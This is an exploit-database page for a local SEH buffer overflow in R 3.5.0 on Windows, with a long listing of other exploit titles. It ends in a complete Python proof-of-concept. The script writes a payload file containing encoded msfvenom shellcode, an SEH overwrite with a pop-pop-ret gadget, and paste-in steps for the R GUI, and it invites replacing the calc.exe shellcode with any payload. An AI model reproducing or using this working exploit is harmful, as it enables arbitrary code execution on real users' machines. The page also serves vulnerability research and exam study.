Menu

"R 3.5.0 - Local Buffer Overflow (SEH)"

Author

"Dino Covotsos"

Platform

windows

Release date

2019-01-31

Release Date Title Type Platform Author
2019-02-14 "exacqVision ESM 5.12.2 - Privilege Escalation" local windows bzyo
2019-02-15 "VSCO 1.1.1.0 - Denial of Service (PoC)" dos windows 0xB9
2019-02-15 "Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-15 "Free IP Switcher 3.1 - 'Computer Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-14 "MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-14 "Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-11 "River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)" local windows crash_manucoot
2019-02-11 "Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure" local windows "Nathu Nandwani"
2019-02-11 "River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH)" local windows Achilles
2019-02-11 "IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter)" local windows "Juan Prescotto"
2019-02-06 "River Past Audio Converter 7.7.16 - Buffer Overflow (SEH)" local windows "Matteo Malvica"
2019-02-13 "NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-11 "NordVPN 6.19.6 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-11 "FutureDj Pro 1.7.2.0 - Denial of Service" dos windows Achilles
2019-02-01 "SureMDM < 2018-11 Patch - Local / Remote File Inclusion" webapps windows "Digital Interruption"
2019-02-01 "PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit" local windows Achilles
2019-01-31 "UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)" local windows "Dino Covotsos"
2019-01-31 "R 3.5.0 - Local Buffer Overflow (SEH)" local windows "Dino Covotsos"
2019-02-05 "River Past Audio Converter 7.7.16 - Denial of Service (PoC)" dos windows Achilles
2019-02-05 "Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-04 "TaskInfo 8.2.0.280 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2019-02-04 "SpotAuditor 3.6.7 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2019-02-04 "River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2019-02-04 "MyVideoConverter Pro 3.14 - Denial of Service" dos windows Achilles
2019-02-01 "Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC)" dos windows "Rafael Pedrero"
2019-01-31 "LanHelper 1.74 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2019-01-31 "FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC)" dos windows "Rafael Pedrero"
2019-01-31 "ASPRunner Professional 6.0.766 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2019-01-31 "AMAC Address Change 5.4 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2019-01-31 "Advanced Host Monitor 11.90 Beta - 'Registration number' Denial of Service (PoC)" dos windows "Luis Martínez"
2019-01-31 "Anyburn 4.3 - 'Convert image to file format' Denial of Service" dos windows "Dino Covotsos"
2019-01-30 "10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2019-01-29 "HTML5 Video Player 1.2.5 - Local Buffer Overflow (Non SEH)" local windows "Dino Covotsos"
2019-01-30 "Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC)" dos windows "Rafael Pedrero"
2019-01-30 "IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC)" dos windows "Rafael Pedrero"
2019-01-30 "Advanced File Manager 3.4.1 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2019-01-24 "Splunk Enterprise 7.2.3 - Authenticated Custom App RCE" webapps windows "Lee Mazzoleni"
2019-01-28 "Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2019-01-28 "BEWARD Intercom 2.3.1 - Credentials Disclosure" local windows LiquidWorm
2019-01-28 "R 3.4.4 XP SP3 - Buffer Overflow (Non SEH)" local windows "Dino Covotsos"
2019-01-28 "Easy Video to iPod Converter 1.6.20 - Buffer Overflow (SEH)" local windows "Nawaf Alkeraithe"
2019-01-23 "Microsoft Windows CONTACT - HTML Injection / Remote Code Execution" local windows hyp3rlinx
2019-01-28 "Smart VPN 1.1.3.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-14 "Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection" webapps windows "SySS GmbH"
2019-01-22 "Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution" remote windows "Eduardo Braun Prado"
2019-01-22 "CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt" remote windows T3jv1l
2019-01-17 "Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation" local windows "Chris Anastasio"
2019-01-17 "Microsoft Windows CONTACT - Remote Code Execution" local windows hyp3rlinx
2019-01-16 "Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation" local windows "Google Security Research"
2019-01-15 "Microsoft Windows VCF - Remote Code Execution" local windows hyp3rlinx
2019-01-14 "Microsoft Windows 10 - COM Desktop Broker Privilege Escalation" local windows "Google Security Research"
2019-01-14 "Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation" local windows "Google Security Research"
2019-01-14 "Microsoft Windows 10 - DSSVC MoveFileInheritSecurity Privilege Escalation" local windows "Google Security Research"
2019-01-14 "Microsoft Windows 10 - DSSVC CanonicalAndValidateFilePath Security Feature Bypass" local windows "Google Security Research"
2019-01-14 "Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Delete Privilege Escalation" local windows "Google Security Research"
2019-01-14 "Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Open Privilege Escalation" local windows "Google Security Research"
2019-01-14 "Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation" local windows "Google Security Research"
2019-01-14 "Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation" local windows "Parvez Anwar"
2019-01-11 "Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)" local windows bzyo
2019-01-21 "Echo Mirage 3.1 - Buffer Overflow (PoC)" dos windows "InitD Community"
2019-01-18 "Microsoft Edge Chakra - 'JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode' Use-After-Free" dos windows "Google Security Research"
2019-01-18 "Microsoft Edge Chakra - 'InitClass' Type Confusion" dos windows "Google Security Research"
2019-01-18 "Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion" dos windows "Google Security Research"
2019-01-18 "Microsoft Edge Chakra - 'InlineArrayPush' Type Confusion" dos windows "Google Security Research"
2019-01-18 "FastTube 1.0.1.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "VPN Browser+ 1.1.0.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "7 Tik 1.0.1.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "Eco Search 1.0.2.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "One Search 1.1.0.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "Watchr 1.1.0.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-16 "Microsoft Windows 10 - 'RestrictedErrorInfo' Unmarshal Section Handle Use-After-Free" dos windows "Google Security Research"
2019-01-16 "Spotify 1.0.96.181 - 'Proxy configuration' Denial of Service (PoC)" dos windows "Aaron V. Hernandez"
2019-01-11 "Luminance Studio 2.17 - Denial of Service (PoC)" dos windows "Ihsan Sencan"
2019-01-11 "Blob Studio 2.17 - Denial of Service (PoC)" dos windows "Ihsan Sencan"
2019-01-11 "Liquid Studio 2.17 - Denial of Service (PoC)" dos windows "Ihsan Sencan"
2019-01-11 "Pixel Studio 2.17 - Denial of Service (PoC)" dos windows "Ihsan Sencan"
2019-01-11 "Paint Studio 2.17 - Denial of Service (PoC)" dos windows "Ihsan Sencan"
2019-01-11 "Tree Studio 2.17 - Denial of Service (PoC)" dos windows "Ihsan Sencan"
2019-01-11 "Selfie Studio 2.17 - Denial of Service (PoC)" dos windows "Ihsan Sencan"
2019-01-09 "BlogEngine 3.3 - XML External Entity Injection" webapps windows Netsparker
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection" webapps windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery" webapps windows LiquidWorm
2019-01-07 "Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data" webapps windows "Anthony Cole"
2019-01-10 "RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2019-01-09 "Microsoft Windows - DSSVC CheckFilePermission Arbitrary File Deletion" local windows "Google Security Research"
2019-01-02 "Microsoft Windows - Windows Error Reporting Local Privilege Escalation" local windows SandboxEscaper
2019-01-07 "KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation" local windows "Hashim Jawad"
2019-01-09 "Microsoft Office SharePoint Server 2016 - Denial of Service (Metasploit)" dos windows "Gal Zror"
2019-01-07 "Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)" dos windows "Luis Martínez"
2019-01-07 "SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)" dos windows "Luis Martínez"
2019-01-07 "BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)" dos windows "Luis Martínez"
2019-01-07 "Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference" dos windows "Bogdan Kurinnoy"
2018-12-24 "Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC)" local windows smgorelik
2018-12-20 "Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Copy/Read" local windows SandboxEscaper
2018-12-21 "Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Read" local windows evil_polar_bear
2018-12-21 "AnyBurn 4.3 - Local Buffer Overflow (SEH)" local windows "Matteo Malvica"
2018-12-20 "Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)" local windows bzyo
2018-12-20 "XMPlay 3.8.3 - '.m3u' Local Stack Overflow Code Execution" local windows s7acktrac3
2018-12-21 "SQLScan 1.0 - Denial of Service (PoC)" dos windows "Rafael Pedrero"
2018-12-20 "VBScript - MSXML Execution Policy Bypass" dos windows "Google Security Research"
2018-12-20 "VBScript - VbsErase Reference Leak Use-After-Free" dos windows "Google Security Research"
2018-12-21 "Microsoft Edge 42.17134.1.0 - 'Tree::ANode::DocumentLayout' Denial of Service" dos windows "Bogdan Kurinnoy"
2018-12-18 "MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow" remote windows "Rafael Pedrero"
2018-12-19 "PDF Explorer 1.5.66.2 - Buffer Overflow (SEH)" local windows Achilles
2018-12-19 "LanSpy 2.0.1.159 - Local Buffer Overflow" local windows "Juan Prescotto"
2018-12-19 "PassFab RAR 9.3.2 - Buffer Overflow (SEH)" local windows Achilles
2018-12-18 "Nsauditor 3.0.28.0 - Local SEH Buffer Overflow" local windows Achilles
2018-12-18 "MegaPing - Local Buffer Overflow Denial of Service" dos windows Achilles
2018-12-18 "Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service" dos windows Achilles
2018-12-18 "AnyBurn 4.3 - Local Buffer Overflow Denial of Service" dos windows Achilles
2018-12-18 "Microsoft Windows - 'jscript!JsArrayFunctionHeapSort' Out-of-Bounds Write" dos windows "Google Security Research"
2018-12-14 "Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)" local windows "Manpreet Singh Kheberi"
2018-12-13 "CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)" local windows Metasploit
2018-12-14 "UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)" dos windows "Francisco Ramirez"
2018-12-14 "Angry IP Scanner 3.5.3 - Denial of Service (PoC)" dos windows "Fernando Cruz"
2018-12-11 "McAfee True Key - McAfee.TrueKey.Service Privilege Escalation" local windows "Google Security Research"
2018-12-11 "LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)" dos windows "Gionathan Reale"
2018-12-11 "SmartFTP Client 9.0.2623.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2018-12-04 "HP Intelligent Management - Java Deserialization RCE (Metasploit)" remote windows Metasploit
2018-12-03 "CyberArk 9.7 - Memory Disclosure" remote windows "Thomas Zuk"
2018-12-04 "Microsoft Lync for Mac 2011 - Injection Forced Browsing/Download" dos windows nyxgeek
2018-12-03 "Mozilla Firefox 63.0.1 - Denial of Service (PoC)" dos windows "SAIKUMAR CHEBROLU"
2018-11-30 "HTML5 Video Player 1.2.5 - Buffer Overflow (Metasploit)" local windows d3ckx1
2018-11-30 "VBScript - 'rtFilter' Out-of-Bounds Read" dos windows "Google Security Research"
2018-11-30 "VBScript - 'OLEAUT32!VariantClear' and 'scrrun!VBADictionary::put_Item' Use-After-Free" dos windows "Google Security Research"
2018-11-26 "ELBA5 5.8.0 - Remote Code Execution" remote windows "Florian Bogner"
2018-11-20 "Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation" local windows "Google Security Research"
2018-11-19 "Microsoft Edge Chakra - OP_Memset Type Confusion" dos windows "Google Security Research"
2018-11-19 "XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)" dos windows s7acktrac3
2018-11-14 "Bosch Video Management System 8.0 - Configuration Client Denial of Service (PoC)" dos windows Daniel
2018-11-13 "XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)" local windows "Semen Alexandrovich Lyhin"
2018-11-13 "Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service" dos windows hyp3rlinx
2018-11-12 "HeidiSQL 9.5.0.5196 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2018-11-08 "Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)" local windows "Tenable NS"
2018-11-06 "VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC)" dos windows "Diego Santamaria"
2018-11-05 "Microsoft Internet Explorer 11 - Null Pointer Dereference" local windows LiquidWorm
2018-10-23 "MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection" webapps windows "Ihsan Sencan"
2018-10-23 "ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection" webapps windows hyp3rlinx
2018-10-12 "Phoenix Contact WebVisit 2985725 - Authentication Bypass" webapps windows Photubias
2018-09-27 "iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection" webapps windows "Sureshbabu Narvaneni"
2018-09-13 "Apache Syncope 2.0.7 - Remote Code Execution" webapps windows "Che-Chun Kuo"
2018-09-13 "Apache Portals Pluto 3.0.0 - Remote Code Execution" webapps windows "Che-Chun Kuo"
2018-09-12 "SynaMan 4.0 build 1488 - SMTP Credential Disclosure" webapps windows bzyo
2018-09-12 "SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)" webapps windows bzyo
2018-09-03 "FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection" webapps windows hyp3rlinx
2018-08-25 "ManageEngine ADManager Plus 6.5.7 - HTML Injection" webapps windows "Ismail Tasdelen"
2018-08-23 "PCViewer vt1000 - Directory Traversal" webapps windows "Berk Dusunur"
2018-08-14 "Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)" webapps windows Metasploit
2018-08-27 "Sentrifugo HRMS 3.2 - 'deptid' SQL Injection" webapps windows "Javier Olmedo"
2018-08-02 "Seq 4.2.476 - Authentication Bypass" webapps windows "Daniel Chactoura"
2018-08-08 "osTicket 1.10.1 - Arbitrary File Upload" webapps windows "Rajwinder Singh"
2018-08-06 "Open-AudIT Community 2.2.6 - Cross-Site Scripting" webapps windows "Ranjeet Jaiswal"
2018-07-06 "Airties AIR5444TT - Cross-Site Scripting" webapps windows "Raif Berkay Dincel"
2018-06-20 "VideoInsight WebClient 5 - SQL Injection" webapps windows vosec
2018-06-20 "Mirasys DVMS Workstation 5.12.6 - Path Traversal" webapps windows Onvio
2018-06-18 "Redatam Web Server < 7 - Directory Traversal" webapps windows "Berk Dusunur"
2018-05-21 "Schneider Electric PLCs - Cross-Site Request Forgery" webapps windows t4rkd3vilz
2018-05-16 "Rockwell Scada System 27.011 - Cross-Site Scripting" webapps windows t4rkd3vilz
2018-05-11 "Open-AudIT Community 2.2.0 - Cross-Site Scripting" webapps windows "Tejesh Kolisetty"
2018-04-24 "Open-AudIT 2.1 - CSV Macro Injection" webapps windows "Sureshbabu Narvaneni"
2018-04-23 "Ncomputing vSpace Pro 10/11 - Directory Traversal" webapps windows "Javier Bernardo"
2018-05-11 "Open-AudIT Professional - 2.1.1 - Cross-Site Scripting" webapps windows "Tejesh Kolisetty"
2018-04-06 "DotNetNuke DNNarticle Module 11 - Directory Traversal" webapps windows "Esmaeil Rahimian"
2018-04-02 "LifeSize ClearSea 3.1.4 - Directory Traversal" webapps windows rsp3ar
2018-03-28 "Microsoft Windows Remote Assistance - XML External Entity Injection" webapps windows "Nabeel Ahmed"
2018-03-12 "ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution" webapps windows Clutchisback1
2018-03-12 "Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution" webapps windows "Chris Lyne"
2018-02-22 "Parallels Remote Application Server 15.5 - Path Traversal" webapps windows "Nicolas Markitanis"
2017-12-14 "Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)" webapps windows Metasploit
2017-12-05 "Perspective ICM Investigation & Case 5.1.1.16 - Privilege Escalation" webapps windows "Konstantinos Alexiou"
2017-11-07 "ManageEngine Applications Manager 13 - SQL Injection" webapps windows "Cody Sixteen"
2017-08-18 "ZKTime Web Software 2.0 - Improper Access Restrictions" webapps windows "Arvind V"
2017-08-18 "ZKTime Web Software 2.0 - Cross-Site Request Forgery" webapps windows "Arvind V"
2017-09-20 "Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)" webapps windows xxlegend
2017-09-28 "Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption" webapps windows hyp3rlinx
2011-09-13 "Carel PlantVisor 2.4.4 - Directory Traversal" webapps windows "Luigi Auriemma"
2017-09-13 "Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)" webapps windows "James Fitts"
2017-09-13 "Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)" webapps windows "James Fitts"
2017-09-13 "Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit)" webapps windows "James Fitts"
2017-08-10 "Red-Gate SQL Monitor < 3.10 / 4.2 - Authentication Bypass" webapps windows "Paul Taylor"
2017-07-10 "Pelco VideoXpert 1.12.105 - Information Disclosure" webapps windows LiquidWorm
2017-07-10 "Pelco VideoXpert 1.12.105 - Directory Traversal" webapps windows LiquidWorm
2017-06-28 "Easy File Sharing Web Server 7.2 - Unrestricted File Upload" webapps windows Chako
2017-06-09 "EFS Easy Chat Server 3.1 - Password Reset" webapps windows "Aitezaz Mohsin"
2017-06-09 "EFS Easy Chat Server 3.1 - Password Disclosure" webapps windows "Aitezaz Mohsin"
2017-06-05 "Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting" webapps windows hyp3rlinx
2017-06-05 "Subsonic 6.1.1 - Server-Side Request Forgery" webapps windows hyp3rlinx
2017-06-05 "Subsonic 6.1.1 - Cross-Site Request Forgery" webapps windows hyp3rlinx
2017-05-03 "Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution" webapps windows LiquidWorm
2017-05-30 "IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow" webapps windows SecuriTeam
2017-08-14 "Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting" webapps windows "Benjamin Lee"
2012-04-08 "Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)" webapps windows Metasploit
2017-06-08 "IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities" webapps windows SecuriTeam
2018-02-14 "NAT32 2.2 Build 22284 - Cross-Site Request Forgery" webapps windows hyp3rlinx
2018-02-14 "NAT32 2.2 Build 22284 - Remote Command Execution" webapps windows hyp3rlinx
2018-01-30 "BMC BladeLogic RSCD Agent 8.3.00.64 - Windows Users Disclosure" webapps windows "Paul Taylor"
2018-01-30 "Advantech WebAccess < 8.3 - SQL Injection" webapps windows "Chris Lyne"
2017-12-20 "BEIMS ContractorWeb 5.18.0.0 - SQL Injection" webapps windows "Rajwinder Singh"
2017-02-18 "Sawmill Enterprise 8.7.9 - Authentication Bypass" webapps windows hyp3rlinx
2017-02-11 "SonicDICOM PACS 2.3.2 - Privilege Escalation" webapps windows LiquidWorm
Release Date Title Type Platform Author
2019-01-31 "UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)" local windows "Dino Covotsos"
2019-01-31 "R 3.5.0 - Local Buffer Overflow (SEH)" local windows "Dino Covotsos"
2019-01-31 "Anyburn 4.3 - 'Convert image to file format' Denial of Service" dos windows "Dino Covotsos"
2019-01-29 "HTML5 Video Player 1.2.5 - Local Buffer Overflow (Non SEH)" local windows "Dino Covotsos"
2019-01-28 "R 3.4.4 XP SP3 - Buffer Overflow (Non SEH)" local windows "Dino Covotsos"

Unfortunately we've not tracked down any possible victims.

Ads

Download file

#!/usr/bin/python
# Exploit Title: R i386 3.5.0 - Local Buffer Overflow (SEH)
# Date: 30/01/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.r-project.org/
# Version: 3.5.0
# Software Link: https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Version: 3.5.0
# Tested on: Windows XP Prof SP3 ENG x86
# Note: SEH exploitation method (SEH + DEP Bypass exploit for Windows 7 x86 by Bzyo available on exploit-db)
# CVE: TBC from Mitre
# Created in preparation for OSCE - DC - Telspace Systems
# PoC:
# 1.) Generate exploit.txt, copy the contents to clipboard
# 2.) In the application, open 'Edit' then 'Gui Preferences'
# 3.) Paste the contents of exploit.txt under 'Language for menus and messages'
# 4.) Click OK - Calc POPS (or change shellcode to whatever you require, take note of badchars!)

#PPR Information
#Message=  0x6cb99185 : pop ebx # pop esi # ret 0x08 |  {PAGE_EXECUTE_READ} [R.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.5.0

#msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a\x7d" -f c
shellcode = ("\xd9\xc6\xb8\x06\x7f\x92\x78\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x31\x83\xc3\x04\x31\x43\x14\x03\x43\x12\x9d\x67\x84\xf2\xe3"
"\x88\x75\x02\x84\x01\x90\x33\x84\x76\xd0\x63\x34\xfc\xb4\x8f"
"\xbf\x50\x2d\x04\xcd\x7c\x42\xad\x78\x5b\x6d\x2e\xd0\x9f\xec"
"\xac\x2b\xcc\xce\x8d\xe3\x01\x0e\xca\x1e\xeb\x42\x83\x55\x5e"
"\x73\xa0\x20\x63\xf8\xfa\xa5\xe3\x1d\x4a\xc7\xc2\xb3\xc1\x9e"
"\xc4\x32\x06\xab\x4c\x2d\x4b\x96\x07\xc6\xbf\x6c\x96\x0e\x8e"
"\x8d\x35\x6f\x3f\x7c\x47\xb7\x87\x9f\x32\xc1\xf4\x22\x45\x16"
"\x87\xf8\xc0\x8d\x2f\x8a\x73\x6a\xce\x5f\xe5\xf9\xdc\x14\x61"
"\xa5\xc0\xab\xa6\xdd\xfc\x20\x49\x32\x75\x72\x6e\x96\xde\x20"
"\x0f\x8f\xba\x87\x30\xcf\x65\x77\x95\x9b\x8b\x6c\xa4\xc1\xc1"
"\x73\x3a\x7c\xa7\x74\x44\x7f\x97\x1c\x75\xf4\x78\x5a\x8a\xdf"
"\x3d\x94\xc0\x42\x17\x3d\x8d\x16\x2a\x20\x2e\xcd\x68\x5d\xad"
"\xe4\x10\x9a\xad\x8c\x15\xe6\x69\x7c\x67\x77\x1c\x82\xd4\x78"
"\x35\xe1\xbb\xea\xd5\xc8\x5e\x8b\x7c\x15")

buffer = "A" * 884 + "\xEB\x09\x90\x90" + "\x85\x91\xb9\x6c" + "\x90" * 20 + shellcode + "D" * 8868

payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"